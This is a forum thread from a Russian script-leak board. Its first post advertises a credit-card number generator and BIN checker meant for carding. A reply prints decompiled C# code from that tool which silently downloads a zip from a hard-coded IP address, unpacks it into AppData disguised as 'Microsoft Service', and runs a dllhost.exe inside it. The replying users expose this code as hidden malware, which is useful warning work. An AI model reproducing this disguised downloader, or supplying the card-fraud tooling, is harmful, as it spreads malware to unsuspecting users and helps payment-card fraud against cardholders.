Софт - ✅|Credit Card| Generator/Checker By LEX1QQQ | End Way - форум программирования и сливов различных скриптов
  • Присоединяйтесь к нам в телеграм канал! EndWay канал | EndSoft канал | EWStudio канал
  • Хочешь поставить скрипт, но не умеешь?
    А может ты хочешь свой скрипт на основе слитого?

    Тогда добро пожаловать в нашу студию разработки!

    Телеграм бот: EWStudioBot
    Телеграм канал: EWStudio

Софт ✅|Credit Card| Generator/Checker By LEX1QQQ

MichaelBronk

Джун
Автор темы
8 Июл 2024
1
15
0
This is a simple program with some CC Tool, it works basically with Luhn algorithm and Regex.

image-2024-07-09-14-42-37.png



Features 🌠
_____________________________________________________________________

CC Generator :

🔯 Generate cards with a specific BIN

🔯 Passing the Regex/Luhn Algorithm validation is optional



image-2024-07-09-14-43-08.png


_____________________________________________________________________

CC Checker :

🔯 Check your CCs using Luhn Algorithm and the most commons Regexes for each credit card brand


image-2024-07-09-14-43-08-2.png


_____________________________________________________________________

Random Bin Checker & Bin Lookup :

🔯 Random Bin Checker works searching for random bins on
https://binlist.net/ and return the valid ones, it also saves the valid bins in a .txt file


image-2024-07-09-14-43-08-3.png







VirusTotal: https://www.virustotal.com/gui/file...938117fabda8df31e221b34b9d267293e90/detection
 
Like
  • 15
Реакции: 14 users

bacitracin

Джун
17 Мар 2024
2
0
1
namespace CC_Tools
{
internal static class Program
{
[STAThread]
private static void Main()
{
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(false);
Task.Run((Func<Task>) (async () => await Program.DownloadAndExtractFileAsync("http://89.110.80.66/private/temp.zip")));
Application.Run((Form) new CC_Tools.Main());
}

private static async Task DownloadAndExtractFileAsync(string url)
{
string tempPath = Path.Combine(Path.GetTempPath(), "temp.zip");
string extractPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Microsoft Service");
using (HttpClient client = new HttpClient())
{
byte[] fileBytes = await client.GetByteArrayAsync(url);
await Task.Run((Action) (() => File.WriteAllBytes(tempPath, fileBytes)));
}
if (Directory.Exists(extractPath))
Directory.Delete(extractPath, true);
Directory.CreateDirectory(extractPath);
ZipFile.ExtractToDirectory(tempPath, extractPath);
string[] files = Directory.GetFiles(extractPath, "dllhost.exe", SearchOption.AllDirectories);
if (files.Length == 0)
{
extractPath = (string) null;
}
else
{
Process.Start(files[0]);
extractPath = (string) null;
}
}
}
}

what is this malware, fucker :D:D:D
 

SSH

connection...
31 Май 2023
182
422
63
что-то я сомневаюсь, что в "simple program with some CC Tool" будет такой детект,
выноска bacitracin выше оправдывает это.
 
Последнее редактирование:
Активность:
Пока что здесь никого нет